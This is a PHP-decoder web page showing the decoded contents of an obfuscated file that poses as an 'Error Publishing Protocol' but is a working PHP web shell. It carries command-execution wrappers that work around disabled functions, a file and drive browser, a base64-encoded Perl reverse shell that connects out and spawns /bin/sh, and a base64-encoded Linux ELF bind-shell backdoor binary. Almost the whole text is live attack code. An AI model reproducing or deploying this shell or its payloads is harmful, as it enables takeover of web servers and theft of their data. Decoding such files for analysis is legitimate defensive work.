Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Error Publishing Protocol * * @version 1.0.5-dc */ /** * ..

Decoded Output download

$sh_id = "BArNEr";
$sh_ver = "Powered by FULLMAGIC COMMUNITY";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://brb.is/.../";
$html_start = '<html><head>
<p align="center">
<title>'.getenv("").' '.$sh_id.'</title><link REL="SHORTCUT ICON" HREF="http://ppa.scisoc.or.th/.../indonesia.gif"></link>
<style type="text/css">
<!--
body,table { font-family:verdana;font-size:11px;color:aqua;background-color:black; }
table { width:100%; }
table,td { border:1px solid black;margin-top:2;margin-bottom:2;padding:5px; }
a { color:lightblue;text-decoration:none; }
a:active { color:#00FF00; }
a:link { color:#5B5BFF; }
a:hover { text-decoration:underline; }
a:visited { color:#99CCFF; }
input,select,option { font:8pt tahoma;color:red;margin:2;border:1px solid lime; }
textarea { color:lime;font:verdana bold;border:1px solid lime;margin:2; }
.fleft { float:left;text-align:left; }
.fright { float:right;text-align:right; }
#pagebar { font:8pt tahoma;padding:5px; border:3px solid black; border-collapse:collapse; }
#pagebar td { vertical-align:top; }
#pagebar p { font:8pt tahoma;}
#pagebar a { font-weight:bold;color:#00FF00; }
#pagebar a:visited { color:#00CE00; }
#mainmenu { text-align:center; }
#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
#maininfo,.barheader,.barheader2 { text-align:center; }
#maininfo td { padding:3px; }
.barheader { font-weight:bold;padding:5px; }
.barheader2 { padding:5px;border:2px solid black; }
.contents,.explorer { border-collapse:collapse;}
.contents td { vertical-align:top; }
.mainpanel { border-collapse:collapse;padding:5px; }
.barheader,.mainpanel table,td { border:1px solid green; }
.mainpanel input,select,option { border:1px solid black;margin:0; }
input[type="submit"] { border:1px solid lime; }
input[type="text"] { padding:3px;}
.shell { background-color:black;color:black;padding:5px; }
.fxerrmsg { color:red; font-weight:bold; }
#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
#pagebar,.mainpanel,input[type="submit"] { background-color:black; }
.barheader2,input,select,option,input[type="submit"]:hover { background-color:black; }
textarea,.mainpanel input,select,option { background-color:#000000; }
// -->
</style>
</head>
<body>
';
$host_allow = array("*"); 
$accessdeniedmess = "<body bgcolor=black><a href=\"$sh_mainurl\"><font color=lime>".$sh_name."</font></a>: <font color=red>access denied</font></body>";
$gzipencode = TRUE;
$filestealth = TRUE; 
$curdir = "./";
$tmpdir = ""; 
$tmpdir_log = "./";
$log_email = ""; 
$sort_default = "0a"; 
$sort_save = TRUE; 
$sess_cookie = "bogelvars"; 
$usefsbuff = TRUE; 
$copy_unset = FALSE; 
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function get_phpini() {
 function U_wordwrap($str) {
  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
 }
 function U_value($value) {
  if ($value == '') return '<i>no value</i>';
  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  if ($value === null) return 'NULL';
  if (@is_object($value)) $value = (array) $value;
  if (@is_array($value)) {
   @ob_start();
   print_r($value);
   $value = @ob_get_contents();
   @ob_end_clean();
  }
  return U_wordwrap((string) $value);
 }
 if (@function_exists('ini_get_all')) {
  $r = "";
  echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
  foreach (@ini_get_all() as $key=>$value) {
   $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
  }
  echo $r;
  echo "</table>";
 }
}
function disp_drives($curdir,$surl) {
 $letters = "";
 $v = explode("\",$curdir);
 $v = $v[0];
 foreach (range("A","Z") as $letter) {
  $bool = $isdiskette = $letter == "A";
  if (!$bool) {$bool = is_dir($letter.":\");}
  if ($bool) {
   $letters .= "<a href=\"".$surl."x=ls&d=".urlencode($letter.":\")."\"".
   ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
   if ($letter.":" != $v) {$letters .= $letter;}
   else {$letters .= "<font color=yellow>".$letter."</font>";}
   $letters .= "]</a> ";
  }
 }
 if (!empty($letters)) {Return $letters;}
 else {Return "None";}
}
if (is_callable("disk_free_space")) {
 function disp_freespace($curdrv) {
  $free = disk_free_space($curdrv);
  $total = disk_total_space($curdrv);
  if ($free === FALSE) {$free = 0;}
  if ($total === FALSE) {$total = 0;}
  if ($free < 0) {$free = 0;}
  if ($total < 0) {$total = 0;}
  $used = $total-$free;
  $free_percent = round(100/($total/$free),2)."%";
  $free = view_size($free);
  $total = view_size($total);
  return "$free of $total ($free_percent)";
 }
}
if (!function_exists("myshellexec")) {
 if(is_callable("popen")) {
  function myshellexec($cmd) {
   if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
   while (!feof($p)) {
    $line=fgets($p,1024);
    $out .= $line;
   }
   pclose($p);
   return $out;
  }
 } else {
  function myshellexec($cmd) {
   global $disablefunc;
   $result = "";
   if (!empty($cmd)) {
    if (is_callable("exec") and !in_array("exec",$disablefunc)) {
     exec($cmd,$result);
     $result = join("
",$result);
    } elseif (($result = $cmd) !== FALSE) {
    } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
     $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
    } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
     $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
    } elseif (is_resource($fp = popen($cmd,"r"))) {
     $result = "";
     while(!feof($fp)) { $result .= fread($fp,1024); }
     pclose($fp);
    }
   }
   return $result;
  }
 }
}
function ex($cfe) {
 $res = '';
 if (!empty($cfe)) {
  if(function_exists('exec')) {
   @exec($cfe,$res);
   $res = join("
",$res);
  } elseif(function_exists('shell_exec')) {
   $res = @shell_exec($cfe);
  } elseif(function_exists('system')) {
   @ob_start();
   @system($cfe);
   $res = @ob_get_contents();
   @ob_end_clean();
  } elseif(function_exists('passthru')) {
   @ob_start();
   @passthru($cfe);
   $res = @ob_get_contents();
   @ob_end_clean();
  } elseif(@is_resource($f = @popen($cfe,"r"))) {
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  } else { $res = "Ex() Disabled!"; }
 }
 return $res;
}
function which($pr) {
 $path = ex("which $pr");
 if(!empty($path)) { return $path; } else { return $pr; }
}

$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7CiRjbWQ9ICJzbGVlcCI7CiRzeXN0ZW09ICdlY2hvICJgdW5hbWUgLWFgIjtlY2hvICJgaWRgIjtlY2hvICJgY2F0IC9ldGMvaXNzdWVgIjtlY2hvICJgY2F0IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyYCI7SElTVEZJTEU9L2Rldi9udWxsIC9iaW4vc2ggLWknOwokMD0kY21kOwokdGFyZ2V0PSRBUkdWWzBdOwokcG9ydD0kQVJHVlsxXTsKJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CiRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgJGlhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7CnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKY29ubmVjdChTT0NLRVQsICRwYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsKb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOwpvcGVuKFNUREVSUiwgIj4mU09DS0VUIik7CnN5c3RlbSgkc3lzdGVtKTsKY2xvc2UoU1RESU4pOwpjbG9zZShTVERPVVQpOwpjbG9zZShTVERFUlIpOw";
$backdoor = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lP